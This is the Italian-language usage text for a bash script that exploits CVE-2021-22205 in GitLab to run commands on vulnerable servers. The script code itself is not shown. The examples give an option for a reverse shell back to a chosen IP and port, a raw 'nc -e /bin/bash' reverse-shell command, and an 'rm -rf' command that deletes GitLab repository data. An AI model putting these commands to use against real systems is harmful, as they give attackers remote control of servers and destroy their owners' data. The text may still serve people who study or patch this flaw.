
Uno script bash semplice che sfrutta la CVE-2021-22205 contro istanze vulnerabili di GitLab
Un semplice script bash che sfrutta CVE-2021-22205 contro istanze vulnerabili di gitlab
Usage: cve-2021-22205.sh [options]
Options:
-h,--help Mostra questo aiuto
-t,--target Imposta il server di destinazione (es. "http://gitlab.example.com")
-i,--reverse-ip Imposta l'IP per la connessione di ritorno
-p,--reverse-port Imposta la porta per la connessione di ritorno
-c,--command Imposta il comando grezzo da eseguire al posto della reverse shell integrata (es. "nc -e /bin/bash 127.0.0.1 1337")
Examples:
Usa il payload della reverse shell integrata:
cve-2021-22205.sh -t http://gitlab.example.com -i 127.0.0.1 -p 1337
Esegui un comando personalizzato:
cve-2021-22205.sh -t http://gitlab.example.com -c "rm -rf /var/opt/gitlab/git-data/*"